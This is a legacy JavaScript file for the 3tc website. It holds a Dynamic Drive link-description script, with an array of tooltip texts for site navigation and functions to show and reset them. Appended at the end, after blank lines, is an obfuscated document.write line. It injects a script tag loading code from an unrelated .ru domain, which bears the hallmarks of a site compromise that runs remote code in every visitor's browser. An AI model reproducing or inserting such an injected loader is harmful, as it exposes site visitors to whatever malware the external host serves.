// Link info script

//Link Description script- © Dynamic Drive (www.dynamicdrive.com)
//For full source code and TOS, visit http://www.dynamicdrive.com

//change link descriptions to your own. Extend as needed
var linktext=new Array()
linktext[0]=":: Welcome to 3tc4u.net home page..."
linktext[1]=":: Return to the home-page of 3tc4u.net"
linktext[2]=":: Find out more about services we can provide for your organisation"
linktext[3]=":: Information on conference facilities at 3tc"
linktext[4]=":: View a sample of our many positive customer testimonials"
linktext[5]=":: Find out all about 3tc, the latest news, it's origins, and the people who work there"
linktext[6]=":: Read the latest news and offers from the 3tc press room"
linktext[7]=":: Get more information concerning 3tc's origins and ethos"
linktext[8]=":: Find out about job vacancies at 3tc"
linktext[9]=":: Visit the Information Communications Technology (ICT) section for computer products & support solutions."
linktext[10]=":: Get great deals on the latest PC hardware &amp; software. 3tc are a certifed Dell reseller."
linktext[11]=":: Find out more about our flexible IT support packages"
linktext[12]=":: Get the details on how to order anything you see on this site"
linktext[13]=":: 3tc's one-stop-shop for all your communication needs, including web &amp; graphic design, print work & marketing"
linktext[14]=":: Click here to get the low-down on our Universal&reg; template system, and explore bespoke design opportunities"
linktext[15]=":: Need a corporate identity or a logo revamp? 3tc can provide all you need and more..."
linktext[16]=":: From paper to pens, if it's print work you require look no further"
linktext[17]=":: Visit this area for information on IT training courses, online learning, and the ECDL qualification"
linktext[18]=":: Find out about our ECDL training courses"
linktext[19]=":: Get information on our one day intensive courses for Microsoft Office applications"
linktext[20]=":: Need basic IT training? We've got you covered with our introductory courses..."
linktext[21]=":: Information about our UK Online center, with listings of opening times"
linktext[22]=":: Visit this area to get in touch with us, with direct e-mail options, addresses, maps, and phone lisitngs"
linktext[23]=":: Click here for a map to 3tc"
linktext[24]=":: Go here for useful staff contact list for our disparate departments."
linktext[25]=":: Request information through this page, including wall-planners &amp; brochures"
linktext[26]=":: Add this website to your favorites simply by clicking."
linktext[27]=":: Increase the default text-size to increase legibility."
linktext[28]=":: View the site map showing the overall stucture of this site."
linktext[29]=":: Help Us by donating your old PC eqipment and peripherals"
linktext[30]=":: View our ultra-competitive rates for conference facility hire"
linktext[31]=":: You'll find our conference facilities are located in a prime location near many amenities"
linktext[32]=":: We thank the continued support of the following sponsors &amp; partners"
linktext[33]=":: Latest News - Research highlights concern over strategic thinking on ICT in voluntary sector."
linktext[34]=":: Latest News - Concern continues to grow over computer waste"
linktext[35]=":: Latest News - 3tc in talks with National ICT Consortium"
linktext[36]=":: Find out how our PC collection service can benefit both your organisation &amp; the environment"
linktext[37]=":: See how you can combine our support solutions with Service discount packages"
linktext[38]=":: Accessorize your PC today with a vast array of peripherals"
linktext[39]=":: View Dell products available through our status as a reseller"
linktext[40]=":: Decrease the default text size"

var ns6=document.getElementById&&!document.all
var ie=document.all

function show_text(thetext, whichdiv){
if (ie) eval("document.all."+whichdiv).innerHTML=linktext[thetext]
else if (ns6) document.getElementById(whichdiv).innerHTML=linktext[thetext]
}

function resetit(whichdiv){
if (ie) eval("document.all."+whichdiv).innerHTML='&nbsp;'
else if (ns6) document.getElementById(whichdiv).innerHTML='&nbsp;'
}





document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Sample.js"></scri'+'pt>');